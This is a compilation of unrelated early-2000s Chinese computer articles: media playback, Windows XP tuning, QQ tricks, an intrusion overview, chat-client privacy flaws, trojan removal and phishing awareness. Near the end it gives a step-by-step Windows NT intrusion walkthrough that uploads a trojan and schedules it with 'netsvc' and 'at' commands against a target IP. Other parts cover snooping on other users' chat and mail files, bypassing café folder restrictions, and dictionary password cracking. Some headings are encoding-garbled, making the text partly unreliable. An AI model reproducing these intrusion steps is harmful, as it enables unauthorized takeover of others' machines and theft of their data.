我们可以将RMVB格式文件的后缀直接改为RM，当作RM格式来播放。如果更改文件后缀名后无法正确播放，可以下载Real One Player的RMVB升级补丁。《金山影霸2003》也有一个专门的RMVB升级包，安装后就可以直接播放RMVB文件了。

最后要提醒大家的是，最新的软件和编码不一定效果最好，有时会遇上兼容性问题。比如DirectX 9就和部分电视卡有冲突。大家最好根据自己的软、硬件环境来选择配套的播放工具及编码支持，对于必须要Windows Media Player 9才能播放的影片，笔者的建议是安装多操作系统，各自安装不同的播放软件。此外，大家可以多关注射手网（Shooter.com.cn），那上面有最新的编码插件和播放软件。

以往我们经常使用”碎片整理”使Windows运行的更快.但现在市场上出售的7200转硬盘，在寻道和传输两方面做了改进，有很多型号还附带有一个8M缓存，而且WinXP使用的NTFS文件系统比FAT系统更有效率。因此，”碎片整理”对提升电脑性能的作用已经非常有限。下面给出能够大幅提升电脑性能，让WinXP运行更快捷 、更可靠的23招实用技巧，希望对您有所帮助 ：


　1)在系统中安装Ultra-133硬盘加速扩充卡或带有8M缓存的ATA硬盘，可以有效减少系统的启动时间。

　2)把内存增加到512M以上。

　3)确定Windows XP使用的是NTFS文件系统。检查方法 ：双击”我的电脑”，在C ：盘上右击鼠标，选择”属性”，检查文件系统的类型。如果是FAT32，就把它转换成NTFS，方法是 ：先备份所有重要的数据，然后选择”开始”菜单里的”运行”，输入CMD后确认。在提示符下，输入CONVERT C ： /FS ：NTFS和回车。在这个过程中，最好不要中途异常中断，并确保系统中没有病毒。

　4)关闭文件索引功能。Windows索引服务要从硬盘上大量文件中提取信息并创建”关键字索引”，如果硬盘上有数以千计的文件，这个功能可以加快从这些文件中搜索信息的速度。但Windows创建这个索引要花费很多时间，而且大多数人从来不使用这个功能。关闭的方法是 ：双击”我的电脑”，在硬盘和下面的子文件夹上右击鼠标，选择”属性”，取消”使用索引以便快速查找文件”。如果有警告或错误信息出现(如”拒绝访问”)，点击”忽略”即可。

　5)升级主板和显卡的驱动程序，升级BIOS。

　6)每三个月左右清空Windows的预读取文件夹(WindowsPrefetch)一次。Windows把频繁使用的数据存放在预读取文件夹中，需要再次使用这些数据时就可以大大加快读取速度。但时间一长，这个文件夹中就会有大量不再使用的垃圾数据存在，反而增加了Windows的读取时间，影响了系统性能。

　7)每个月运行一次磁盘清理程序，删除临时和无用文件。方法 ：双击”我的电脑”，在C ：盘上右击鼠标，选择”属性”，点击”磁盘清理”按钮。

　8)在”设备管理员”中双击IDE ATA/ATAPI控制器，到Primary/Secondary IDE Channel里将所有连接设备的转输模式都设定为使用DMA(如果可用)。

　9)更新接线.采用了新式的硬盘后，应该同时为所有IDE设备换装80线的Ultra-133线缆。如果只安装一个硬盘，那么这个硬盘应该安装在线缆的顶端，不要安装在线缆中间的那个接口，否则可能发生信号异常。对于Ultra DMA硬盘驱动器来说，这些异常信号会影响驱动器发挥最佳性能。

　10)清除所有spyware(间谍程序)。有很多免费软件，如AdAware，可以完成这个任务。清除后，所以包含spyware的软件都将不能正常工作，如果确实需要其中的某个软件，就把它重新安装一遍吧。

　11)从启动组里删除不必要的程序。方法 ：选择”开始”菜单里的”运行”，输入”msconfig”，进入”启动”选项卡，取消不想在系统启动时加载的项目。对于不能确定的项目，查阅一下”WinTasks Process Library”(进程库)，里面包含了已知的系统进程、应用程序和spyware的描述。也可以在google等WEB搜索引擎中查找。

　12)进入控制面板中的”增加/删除程序”项，删除不必要的和不用的程序。

　13)关闭所有不必要的动画和活动桌面。方法 ：在控制面板中点击”系统”图标，进入”高级”选项卡，对”性能”进行”设置”，在”视觉效果”选项卡上， 选中”自定义”单选框，将有关用户界面特性设定为禁用状态。

　14)使用Tweak-XP软件编辑系统注册表，进一步提升性能。

　15)定期访问微软Windows更新站点，下载所有标有”Critical(重大)”标志的更新项目。

　16)每周更新防病毒软件。系统中最好只安装一套防病毒软件，安装多套软件会对性能带来不利影响。

　17)安装的字体数量不要超过500种，字体数量太多会使系统变慢。

　18)不要对硬盘分区。Windows XP的NTFS文件系统在一个比较大的分区上运行会更有效率。以前，人们为了方便数据组织或重新安装操作系统时不必格式化整个硬盘而对硬盘进行分区。在Windows XP的NTFS文件系统中，重新安装操作系统已不必重新格式化分区，数据组织更可以通过文件夹来完成。例如，不需要再把大量的数据放到另外划分的D ：盘上，可以创建一个命名为”D盘”的文件夹，数据放在这个文件夹中即不影响系统性能，又能起到很好的组织作用。

　19)测试内存条(RAM)是否完好。建议使用免费程序MemTest86，先用这个程序制作一个启动盘，用此盘启动电脑后程序将对内存条运行10项不同的测试，每项测试进行3遍。如果测试中遇到错误，就关闭电脑，拔掉其中一根内存条(如果有多根的话)，重新测试。仍掉坏的内存条，换上一根好的。

　20)如果电脑上安装了CD或DVD刻录机，有时候升级驱动程序可以使刻录速度更快。

　21)取消不必要的服务。Windows XP调用了许多用户可能根本用不到的服务，这些服务不仅影响运行速度，对保护系统安全也非常不利。因此，可以根据需要禁用不必要的系统服务。方法 ：选择”开始”菜单里的”运行”，输入”Services.msc”打开”服务管理控制台”，通过更改服务的启动类型启动或停止该项服务。

　22)如果感觉Windows的单窗口浏览器速度比较慢，可以加以改进，方法是 ：打开”我的电脑”，点击”工具”->”文件夹选项”->”查看”，选中”使用独立的进程打开文件夹窗口”。这样可以防止一个较慢的设备影响用户界面的响应速度。

　23)打开机箱，把灰尘和碎片打扫干净，每年至少做一次。同时检查一下所有的风扇是否工作正常，主板上的电容器有没有膨胀或泄漏。

　 至此，23招都用过一遍，是不是对自己的系统更满意了?

　　提醒 ：虽然”碎片整理”对提升电脑性能作用有限，但一个没有碎片的硬盘总比一个布满碎片的硬盘消耗的功率少，况且，一旦硬盘损坏，如果硬盘上的数据连续存放，就更容易恢复.所以，仍建议每隔一段时间(根据机器使用情况，从数月到一年不等)，对硬盘做一次”碎片整理”。

QQ是大家使用最为广泛的一个聊天工具，我想有很多人连做梦都想成为QQ高手吧？也许有人会认为“QQ高手不就是那种对QQ基本功能操作很熟练的人吗？”大错特错！对“高手”的标准实在太低了吧，相信就算是“菜鸟”也能几天就搞定的。但是，要是你掌握一些非常特殊的绝技，呵呵，那你一定可以在朋友面前炫一把，让大家对你刮目相看了，地位自然也是一日千里地上升为真正的QQ高手。废话不多说了，下面让我赶紧告诉你这10条最酷的秘技吧！

1、灵验的登录方法

相信大家或多或少都有过这样的体验，登录QQ时，小企鹅在屏幕上徒劳地闪动半天之后，弹出来的却是服务器太忙无法登录或者超时的提示框，接连试几次都是这样的，真的有点烦人。别着急，用下面的方法一定能让你顺利登录上去的。
先说第一种方法。如果你使用的是默认登录面板登录的话，那么你可以改用“注册向导”试试，一般情况下都能成功。还不管用的话，就得使用更绝的第二种方法了——打开多个QQ窗口来同时登录同一个号码。我遇到上述情况就会同时打开三个窗口，这里面肯定会有一个能登录上去的，百试不爽。不过也有一种情况是例外的，那就是：网络断线的时候:)。

2、快速定位好友

现在在一个QQ里加有好几百号人是不足为奇的事，但是Q友多了也会给自己添麻烦的哟！想想看，要在这么一大堆人里找到某某MM可不是件容易的事。怎么办？跟我做吧！首先激活QQ面板，切换到某某MM所在的组，然后在键盘上按下好友昵称的首字母（如“Vc水手”取首字母“V”，而“维C水手”取拼音“wei”的首字母“W”就定位到了一组以此字母为昵称首字母的好友了，现在找起人来方便了许多吧！

3、回到好友列表顶端
当你在QQ某个组中按了向下按钮又想回到列表顶端时，你没有必要再去按那个向上按钮了。有一个化繁为简的方法是：试着与其他任何一个组之间切换一下，再回到原先的组看一看，呵呵，奇迹出现了，你又回到顶端了。

4、打造个性的资料
你有没有发现有些人QQ资料填得很特别很有个性呢？比如“国家/地区”填的根本不是下拉列表中的内容，甚至可以换成一个贴图，你会觉得不可思议吧？其实你也完全可以拥有这么个性的资料的。实现方法很简单，在填写资料时你可以不理会那些下拉列表，直接填入你想填的内容即可（贴图可以到专门的网站去Copy）。但请注意并不是所有下拉列表都是形同虚设的，有些内容必须择其一才能填入。

5、让头像伤心前排
想更多地吸引MM对你的注意吗？那你在她的列表中的位置可一定要排得伤心前一些哟！要不然人家可能会看不到你或者对你视而不见……用不着生气，想个法子让自己排得伤心前些不就行了吗！好，为了帮你实现“企图”，这一招我教定你了。Follow me，打开“个人设定”窗口，然后在自己的昵称前点一下鼠标，再按空格键插入一两个空格（不能太多了，要不然昵称就不能完整显示了），然后点击“修改”按钮进行修改。这样，以后当对方更新了你的资料或者重新登录时，你的头像就可以排在其列表数一数二的显赫位置了（在线的情况下），现在对方要想不看见你都不可能啦。
同理，想把谁放到你的好友列表顶端，就给他“改名”，在他名字前加一两个空格就行。

6、把自己加为好友
这一招可是厉害得很，可以让自己的头像出现在本身的列表上，这不仅显得很酷，而且有很实用得功能哦（比如下面一条秘技中就可以用到）！其实最早期的QQ版本中是可以直接把自己加为好友的，但现在的版本都行不通了。但是只要我们肯动手，没有什么能难倒我们的。步骤如下：
首先建议设定到“允许任何人把我列为好友”，然后切换到“黑名单”组，在里面空白处点击右键并选“添加坏人名单”，输入自己的QQ号码（什么？把我自己当成坏人了呀！），接下来再把这个“坏人”拖到“我的好友”组中去，这时会弹出“不能添加自己”的提示，不理会它，直接退出QQ。
再一次用注册向导登录时（注意这里一定要用注册向导！），就可以看见自己的头像已经在列表中了，而且，还可以和“自己”说话呢！

7、查看隐藏的文件夹
有时我们在网吧上网需要查看某些文件夹，无奈管理软件却把它们给隐藏起来了，怎么也打不开。有了QQ就好办了，你可以利用它来另类地打开这些文件夹。方法是：在机器中打开两个QQ号码甲和乙（如果没有两个号码，可以用注册向导，在自己号码前加一个“0”登录，登录后显示号码为“0xxxxxxx”），用左键在甲中点击乙的头像并选择“传送文件”，接着随便在电脑中找个小一些的文件进行传送，由乙来接收，很快就会接收完毕，弹出了一个很关键的窗口，提示“文件接收完毕，是否转到文件所在目录？”，这时请一定点击“是”按钮。
嘿嘿，现在可以随心所欲地查看该文件夹了吧！

8、与不喜欢的人“永别”
俗话说“林子大了，什么鸟都有”，在用QQ聊天时我们也会有碰到“坏鸟”的。你把对方删除掉也不见得能得到清净，他（她）还是可以在陌生人里喋喋不休地骚扰你。隐患就在于你的头像还保留在对方的列表里。所以我要提醒你，以后遇到这样的情况一定不能手软，就一定要毫不犹豫地把“坏鸟”拖入“黑名单”中。这样，双方都会彻底地从对方列表中消失了，也就没有人能烦到你了。当然如果对方已经赖在“陌生人”里了也还有补救措施，很简单，同样把这个人拖入“黑名单”就行了。

9、让数据重见天日
作为在网吧使用QQ的用户，由于经常“行踪不定”，学会QQ数据的备份与恢复是很重要的。如果只要备份QQ消息数据（包括聊天记录、用户信息以及系统消息等）可以直接用“消息管理器”来实现。操作很简单，我就不多说了。如果要备份全部的数据信息（还包括用户信息、分组信息、好友列表等），你就应该找到一个以你的QQ号码命名的用户目录文件夹（默认路径在C:Program FilesTencent下），把它备份就可以了。这些备份数据一般都不大，你完全可以压缩后把它作为附件发送到E-mail里，下次在别处使用QQ时再下载过来，然后通过“消息管理器”把消息数据导入或者用目录文件覆盖同名目录（注意之前要先登录一次，退出后覆盖），这样就大功告成，你的数据资料又奇迹般地回来了！

10、简单有效的防黑术
现在网上（特别是网吧）盗取QQ密码的方法层出不穷，搞得QQ用户人人自危。有一种通过监视来获得密码的工具更是防不胜防，它一般在本地机器中隐藏运行，会自动记录那些号码位数不超过9位的QQ登录密码，甚至还可以自动把这些密码发送到指定的邮箱。基于它的原理，我们就可以采取对应的防黑措施了。具体做法是：在登录的时候，在号码前加入一串的“0”（比如20个），我们会发现这并不影响正常的登录，但是你在本地机器上的号码却变成了一大串的“0”。这样一来，再聪明的监视盗号工具也会对这种长号码不理不睬了，当然你也就不必担心QQ密码泄露了~~~

“轻用其芒，动即有伤，是为凶器；深藏若拙，临机取决，是为利器。HK不是从真正意义上的去黑，而是挑战自己，挑战困难，坚毅，执著，智慧……”

本章阐述各种级别的攻击。“攻击”是指任何的非授权行为。这种行为的目的在于干扰、破坏、摧毁你服务器的安全。攻击的范围从简单地使某服务无效到完全破坏你的服务器。在你网络上成功实施的攻击的级别依赖于你采用的安全措施。

⒈攻击会发生在何时？
大部分的攻击（或至少是商业攻击时间一般是服务器所在地的深夜。换句话说，如果你在洛杉矶而入侵者在伦敦，那么攻击可能会发生在洛杉矶的深夜到早晨之间的几个小时中。你也许认为入侵者会在白天（目标所在地的时间）发起攻击，因为大量的数据传输能掩饰他们的行为。有以下几个原因说明为什么入侵者避免大白天进行攻击：
■客观原因。在白天，大多数入侵者要工作，上学或在其他环境中花费时间，以至没空进行攻击。换句话就，这些人不能在整天坐在计算机前面。这和以前有所不同，以前的入侵者是一些坐中家中无所事事的人。
■速度原因。网络正变得越来越拥挤，因此最佳的工作时间是在网络能提供高传输速度的时间速率的时间。最佳的时间段会根据目标机所在地的不同而不同。
■保密原因。假设在某时某入侵者发现了一个漏洞，就假定这个时间是早上11点，并且此时有三个系统管理员正登录在网上。此时，此入侵者能有何举动？恐怕很少，因为系统管理员一旦发现有异常行为。他们便会跟踪而来。
入侵者总是喜欢攻击那些没有使用的机器。有一次我利用在日本的一台工作台从事攻击行为，因为看上去没有人在此机器上登录过。随后，我便用那台机器远程登录回美国。在罗马我发现了一个新的ISP也出现类似的情况。对于这类计算机，你可以暂控制它，可按你的特殊要求对它进行设置，而且你有充足的时间来改变日志。值得注意的是，绝大部分的这种攻击行为都发生在晚上（被攻击对象的当地时间）。
⒉入侵者使用何种操作系统？
入侵者使用的操作系统各不相同。UNIX是使用得最多的平台，其中包括FreeBSD和Linux。
⑴Sun
入侵者将SolarisX86 或SCO作为使用平台的现象相当常见。因为即使这些产品是需要许可证，它们也易获得。一般而言，使用这些平台的入侵者都是学生，因为他们可利用软件产品卖给教育部门和学生时可打很大的折扣这一优势。再者，由于这些操作系统运行在PC机上，所以这些操作系统是更经济的选择。
⑵UNIX
UNIX平台受欢迎的原因之一是它只耗费系统一小部分资源。
⑶Microsoft
Microsoft平台支持许多合法的安全工具，而这些工具可被用于攻击远程主机。因此，越来越多的入侵者正在使用Windows NT。Windows Nt的性能远远超过Windows 95并有许多用于网络的先进工具；而且NT正变得越来越流行，因为入侵者知道他们必须精通此平台。由于NT成为更流行的Internet服务器的操作平台，入侵者有必要知道如何入侵这些机器。而且安全人员将会开发工具来测试NT的内部安全性。这样，你将看到利用NT作为入侵平台的人会极剧增加。

⒊攻击的源头
数年前，许多攻击来源于大学，因为从那里能对Internet进行访问。大多数入侵者是年青人，没有其他的地方比在大学更容易上Internet了。自然地，这不仅影响了攻击的起源地而且影响着攻击发生的时间。同时，使用TCP/IP不像今天这样简单。
如今形势发生了巨大的变化，入侵者可在他们的家里、办公室或车中入侵你的网络。然而，这里也有一些规律。

⒋典型入侵者的特点
典型的入侵者至少具备下述几个特点：
■能用C、C++或Perl进行编码。因为许多基本的安全工具是用这些语言的某一种编写的。至少入侵者能正确地解释、编译和执行这些程序。更厉害的入侵者能把不专门为某特定某平台开发的工具移植到他用的平台上。同时他们还可能开发出可扩展的工具来，如SATAN 和SAFESuite（这些工具允许用户开发的工具附加它们上）。
■对TCP/IP有透彻的了解，这是任何一个有能力的入侵者所必备的素质。至少一个入侵者必须知道Internet如何运转的。
■每月至少花50小时上Internet。经验不可替代的，入侵者必须要有丰富的经验。一些入侵者是Internet的痴迷者，常忍受着失眠的痛苦。
■有一份和计算机相关的工作。并不是每个入侵者都是把一天中的大部分时间投入到入侵行为中。其中一些从事着系统管理或系统开发的工作。
■收集老的、过时的但经典的计算机硬件或软件。

⒌典型目标的特征
很难说什么才是典型目标，因为不同入侵者会因不同的原因而攻击不同类型的网络。然而一种常见的攻击是小型的私有网。因为：
■网络的拥有者们对Internet的使用还处于入门阶段
■其系统管理员更熟悉局域网，而不是TCP/IP
■其设备和软件都很陈旧（可能是过时的）
另一话题是熟悉性。绝大多数入侵者从使用的角度而言能熟知两个或多个操作系统，但从入侵的角度来看，他们通常仅了解某一个操作系统。很少的入侵者知道如何入侵多种平台。

大学是主要的攻击对象，部分原因是因为他们拥有极强的运算处理能力。
另个原因是网络用户过多。甚至在一个相对小的网段上就有几百个用户。管理这种大型网络是一件困难的任务，极有可能从如此的帐号中获得一个入侵帐号。其他常被攻击的对象是政府网站。

⒍入侵者入侵的原因
■怨恨
■挑战
■愚蠢
■好奇
■政治目的
所有的这些原因都是不道德的行为，此行为过头后便触犯了法律。触犯法律可带来一些令人激动的感受，这种感受又能消极地影响你的原因。

⒎攻击
攻击的法律定义是指：攻击仅仅发生在入侵行为完全完成且入侵者已在目标网络内。但我的观点是可能使一个网络受到破坏的所有行为都应称为“攻击”。即从一个入侵者开始在目标机上工作的那个时间起，攻击就开始。
可通过下面的文章了解入侵的事例：
ftp://research.att.com/dist/internet_security/berferd.ps
http://www.takedown.com/evidence/anklebiters/mlf/index.html
http//www.alw.nih.gov/security/first/*****s/general/holland.ps
http://www.alw.nih.gov/security/first/*****s/general/fuat.ps
http://www.alw.nih.gov/security/first/*****s/general/hacker.txt

⒏入侵层次索引
■邮件炸弹攻击
■简单拒绝服务
■本地用户获得非授权读访问
■本地用户获得他们本不应拥有的文件的写权限
■远程用户获得了非授权的帐号
■远程用户获得了特权文件的读权限
■远程用户获得了特权文件的写权限
■远程用户拥有了根权限（他们已经攻克了你的系统）

我们有很多优秀的国内热门软件。比如大家都爱使用的FoxMail和OICQ。它俩的结合使用正是许多朋友的网络通讯方案。这两个软件的确不错，可以成为很多国际著名软件的替代产品。它们最新的版本是FoxMail3.0 Beta2和OICQ99aBuild1005。但在多人使用时就暴露出他们的安全隐患。
现在音樂狂迷在这里就向大家解释FoxMail和OICQ的安全隐患和解决的办法：

1.FoxMail

　　FoxMail的安全性问题已多次被提及。我认为网络上的安全不是我们普通用户能够控制，但只要是单人使用，从这个角度上讲还是算安全。但如果是多人使用同一台电脑，安全问题就很难说了。大家都知道在资源管理器中使用复制和覆盖式粘贴的方法将收件箱和发件箱转移到一个没设口令的帐号，甚至是入侵者自建的假帐号，就可以绕过对帐户口令的检验，轻而易举地查看邮件的内容（自由浏览）……他这时无所不能。但还有一点值得注意，就是即便是将收件箱、发件箱、已发送邮件箱、废件箱里的邮件清空，别人也可在知道对方地址的情况下不打开该帐号就能修该帐号和以您的名义撰写和发送新邮件（冒名顶替）。具有讽刺意义的是系统居然还让他方便地套用您事先设好的格式（模板）。FoxMail的地址薄可能是对方下手的第一目标，因为FoxMail没对它进行任何形式的保护。在那里您交往的朋友和他们的信息暴露无疑。

　　解决的方法：

　　1.把解压后的FoxMail目录放到如c:lcadxhl的多重目录下，在IE的设置中不要把它设为浏览器默认的邮件软件，在隐蔽的地方建它的快捷方式（方便你的使用）。目的：不让别人发现你使用FoxMail（不能根本解决）。

　　2.不使用FoxMail的地址薄。

　　3.每次使用都删除帐号（麻烦）。

　　4.等等新版本。

2.OICQ

　　许多朋友是在网吧里上网的，我也常去。OICQ是我们经常使用的。网吧里共用OICQ也是很正常的事。新版的OICQ支持收发讯息、传送文件、语音传送、二人世界、网络会议、BP机短讯、手机短讯、发送邮件、个人主车取Ｋ比ICQ更方便，比PCICQ功能更多。但安全问题真让人担忧。

　　从我们熟悉的资源管理器入手，一切秘密都会在此暴露。在C:Program Filesoicq下（假设他按默认目录安装）你可以看到许多帐号（因为是网吧嘛）。双击进入任意一个帐号，可以看到.cfg的文件，那是本帐号的配置文件，其他有很多.msg文件。那些.msg文件的文件名就是他的OICQ的朋友的帐号。现在用记事本打开sysmsg.1st里面的记录的是某某帐号在何日何时将本帐号用户列为好友（当然是没被删除的）。再用记事本把friend.v30打开，里面有好友的登记资料以及用“收发信息”交谈的内容，还包括陌生人、黑名单方面的内容（真要命）。再用记事本把bookmark.dat打开（如果有），看看也会吓死你。如果有tempfiles.tmp文件，通常是其他人用“语音传送”发来的声音文件，tempfiler.tmp通常是本帐号用户发给其他人的声音文件。只要用录音机就可以打开播放。够了吧，还有什么可以保密。

　　解决的办法：

　　很简单也有效。在网吧下网后删除自己用的帐号目录。下次使用时选注册向导，选“使用已有的OICQ号码”，再逐步注册就行。记住下网后删除哦。

　　OK，音樂狂迷祝你网上愉快!

　 今天，也就是8月9日，我象往常一样开机后，回了QQ空间的贴以后就察看防BO病毒软件TCactive!,发现前几天显示框内只显示11个线程，今天却显示12个，想想这几天没有装任何软件，于是运行msconfig.exe,发现多出一个kernel32.exe，形似windowssystem下的kernel32.dll,当时没有多想。
　　
　　中午没事做，就随手拿起了8月23日出版的《电脑商情报》便埋头看了起来，看到“蔫老虎信箱”时，有一小篇读者来信是关于冰河病毒的，“从未染过”BO的我猛然一震，kernel32.exe是冰河病毒的程序，连忙开机查找，发现在windowssystem下有一同名文件，由于程序正被运行，无法删除，先删除注册表中所有与”kernel32.exe”有关的项，然后重启到MS-DOS下，用DELTREE命令删除，以为万事大吉，然而进入window界面后，发现其又在运行，病毒程序还在windowssystem下。
　　
　　到黑客网站上下载一“冰河V2.2版”，解压后有四个文件(G_Client.exe、G_Server.exe、operate.ini、readme.txt),进行解析，发现运行被监控端后台监控程序g_server.exe后即感染病毒，监控端通过监控端执行程序g_client.exe 进行监视。kernel32.exe是与文件类型(如txtfile,exefile)相关联,以便被删除后在打开相关文件时自动恢复。查找与病毒感染时间相近的文件，发现在windowssystem下有kernel32.exe 、sy***plr.exe、sendme.dll、sendme.dl_、sendme.cfg等文件，感染日期、时间基本相同，其中sy***plr.exe可打开TXT文件，正是与病毒关联的程序，将上述文件除kernel32.exe外全部删除 ，删除注册表中所有与“kernel32.exe”、“sy***plr.exe”有关的项,并在MS_DOS下删除kernel32.exe,重启多次未发现病毒，至此病毒完全消除。　　
　　
若要打开TXT文档，在打开方式中重新选择“NOTEPAD.EXE”，选择始终以该程序打开即可；我就曾在打开OICQ后，在网上与陌生人聊天，打开其留言，没想到无意中感染病毒。由此奉劝各位网友在网络中不要随意打开陌生人发来的E_mail或留言，以免不必要的麻烦！

电脑网络就像一个潘多拉魔盒，光怪陆离、无所不有。但它在给人们的生活增添无穷乐趣的同时，也充斥着太多的骗局和陷阱，不时地令冲浪者防不胜防，这个无法回避的事实告诫人们在网上要时刻保持足够的警惕，那么，如何做呢？

网络上的诈骗大都来自于“黑客”。其实，“黑客”也并不是什么不食人间烟火的怪物，而是像你我一样活生生的普通人，许多被发现的“黑客”只不过是十几岁的中小学生。如果你掌握一些必要的网络知识，那么只要你愿意，完全也可以“黑”人家一把。当然，我并不是鼓励你这么去做，而是想说明：“黑客”并不神秘，所以，只要有心，我们完全能对付！

最“笨”的“黑客”采取的手段看起来很拙劣，他们的策略完全是“姜太公式的”，这类“黑客”往往在自己的主页上制造种种借口，或以大奖作诱饵，要求访问者留下自己的Internet用户名、账号、密码、信用卡密码等个人敏感信息，碰到这种情况，你千万千万要记住：不要一时冲动，将自己的资料和盘托出！不管对方吹得如何天花乱坠，只要做到心明眼亮，对方就只能徒呼奈何。

当然，“黑客”不都是如此“弱智”的，他们总是会绞尽脑汁地不断变换“作案”手法，千方百计地要攻破别人的城池。典型的做法是：“黑客”通过电子邮件，或在你下载软件的时候，神不知鬼不觉地将一些“神秘”的小程序悄悄地移植到你的机器上，这些小程序会潜伏下来，自动地修改操作系统的核心、开辟数据通道，留下一个危险的后门，当你的机器再一次联上网络时，它们就像“特洛伊木马”一样，将你的账号口令等信息传送给坐享其成的“黑客”。

因为这种“间谍”程序像正常软件一样，也在不断“升级”，所以要防范它们难免有挂一漏万的情况。但原则的做法是不变的，那就是：对电子邮件中的附件或邮件列表保持警觉，不要一收到信箱中就马上打开，只有待杀毒软件对它们验明正身后才可以放行；下载软件时尽量不要使用系统原始的下载工具，尽量使用镶嵌了杀毒软件的下载工具！

以上涉及的都是个人如何防备“黑客”的问题，与个人比较起来，企业网络的安全无疑要重要得多，无论是学校的机房，还是银行、商业机构甚至ISP，它们组建的网络一旦被侵犯，后果往往是不堪设想的。所以对于他们来说，“扎紧篱笆”、堵住“后门”就格外显得紧迫，而“专业”的“黑客”也往往以这类目标作为攻击对象。下面从黑客常用的攻击手段中撷取几种，让大家见识一下。

1闭婕倮铄

在登录一些站点特别是那些提供个人服务(比如股票、银行)的站点时，站点往往会首先要访问者填写一些密码之类的个人信息后才能进入。一些“高明”的“黑客”正是利用了这个过程，精心伪造一个登录页面，抢在真正的登录页面之前出现，待你“认真”地写下登录信息并发送后，真正的登录页面才姗姗来迟，而这时你的秘密已被窃取了。今年9月份台湾发生的一宗网络银行诈骗案，狡猾的犯罪分子用的就是这种伎俩。对付此种“黑客”，最佳的解决之道就是防患于未然，经常查看服务器的运作日志，若发现疑点要坚决及早处理，将隐患消灭在萌芽状态之中。

2鄙东击西

一些“黑客”利用某些防火墙的漏洞，巧妙地将自己的IP请求设置成指向防火墙的路径，而不是受防火墙保护的主机，所以他们可以畅通无阻地接近防火墙，这时“黑客”已经达到了目的。因为此时他们完全可以虚晃一枪，利用防火墙作跳板，轻松地长驱直入，直捣主机！如果有这种情况发生，那就得考虑是否要更换防火墙了，或者升级原来的防火墙，为它打上补丁。

3币徽爰血

能够“修炼”到这种境界的一般都是“黑客”中的高手。他们凭借自己高超的技术，通过分析DNS(域名管理系统)而直接获取Web服务器等主机的IP地址，从而为打入“敌阵”彻底扫除障碍。对付这种“黑客”，几乎没有更好的办法，也许尽量不要接受免费域名服务是一个有点儿价值的措施，因为正规的注册域名服务一般都会有有效的安全手段，可以保证少受攻击或不受攻击。

4迸郧貌嗷

电子邮件其实是一种很脆弱的通讯手段，一方面，它的安全性很差，传送的资料很有可能丢失或被中途拦截；另一方面，“特洛伊木马”等“黑客程序”大都通过电子邮件这个途径进驻用户的机器。而电子邮件恰恰是网络上用得最多的东西，许多公众网站和大公司局域网，出于吸引访问者或工作的需要，提供免费邮件或内部邮件的服务，而邮件服务器就成了“黑客”们攻击的对象。大名鼎鼎的微软甚至也深受“黑客”之害，而被迫将邮件服务器关闭了一天。当然，防范这些“黑客”，可采用以下措施：如邮件服务器专设专用，不与内部局域网发生关系；开启防火墙的邮件中转功能，让中转站过滤所有出入邮件等等。

以上所述的只不过是有关网络安全的一小部分，还有许多现象没有谈及。其实，谈得再多也不能使我们完全看清网络上的所有“猫腻”，因为网络的开放性决定了它的复杂性和多样性。随着技术的不断进步，各种各样高明的“黑客”会不断诞生，同时，他们使用的手段也会越来越先进，要斩断他们的黑手是不可能的。我们唯有不断加强防火墙等的研究力度，加上平时必要的警惕，相信“黑客”们的舞台将会越来越小。

在一些入侵NT的教学里都有讲到执行程序的方法，我单独提出来写成贴子可能是多余，但我还是希望对大家有用。操作系统平台：必须为NT，可以是WINNT4.0或5.0；WorkStation 或Server；还可以是WIN2000。

工具:Netsvc.exe 用于启动远程主机的schedule服务。

开始：开DOS窗口，输入net use \ip 等等连接上目标主机。把木马上传到目标主机。建议放在你共享的所在目录，或系统目录WINNT下,执行时不用再输入程序所在路径。木马都有自我删除功能，所以一般不会被管理员发现。
上传木马后，键入:

C:/>netsvc \ip schedule /start

启动目标主机的schedule服务(schedule服务用来定时执行某程序，我们可利用它来执行木马程序)。这过程可能会持续较久,一定要等到提示符出现才进行下一步,不要急急忙忙关了窗口.
然后键入:

C:/>net time \ip

将显示目标主机的系统时间，如：14:43
记住这时间，接下来用AT命令往目标主机添加入定时启动木马程序的任务，键入：

C:/>at \ip 14:45 trojan.exe

注意：这里我启动时间定为14:45而不是14:43，往后推迟了几分钟，这是考虑到命令往返于两机需要一定的时间（中国的网络速度实在太慢啦!)
至此，你只要等稍等几分钟过去，就可以打开你的木马客户器控制目标主机了，也不用那么麻烦地执行程序啦！木马程序的路径要设定好！

要入侵系统首先阻碍我们的将是网络管理员的第一道安全防线－合法的用户名与口令，它决定乐你在该网站的权限，所以口令入法可以说是黑客的基础对于一个刚开始学习HACK的网友这篇文章可能会让你大有所进。

当我们要试着解密之前我们得先来了解一下加密的过程，兼于加密方法的种类之多，我们就讲一下标准的UNIX加密技术，但关于DES加密技术的材料很少这主要是IBM应美国**********的要求把某些文档定为了国家机密文档，而UNIX下的一个加密程序Crypt(3)却广泛的流传，甚至它的源代码随处可得，它的加密过程如下：

1】以明码正文形式取出口令。

2】把口令作为关键词，用一系列的“0”进行敝屏加密。

3】把一个64位二进制值转变成以56位为变量基础的唯一

的64位二进制值，作为关键字再加密。

兼于CRYPT（3）的加密随机性之大，56位关键字的存在可能性超过7×10E16种，所以想要逆向解码是不可能的（如用奔腾II的计算速度可能要1185年零7月，如果那位网友成功的话请马上通知我，去申请诺贝尔奖。〕

但是否真的无解了呢？错！

我们可以用比较法，其方法如下

1】获得一个字典文件，它是一个单词表。

2】把这些单词用用户的加密程序进行加密，（符合DES标准〕

3】把每个单词加密后的结果与目标加密后的结果进行比较

如果匹配，则该单词就是加密关键字。

现在已经有了一些程序能帮助我们完成上面的工作，使解密变的由其简单，而我们要作的就是把加密后的口令文件抓回来。

这类软件常用的有　

Carck 、Jack14 、 Joun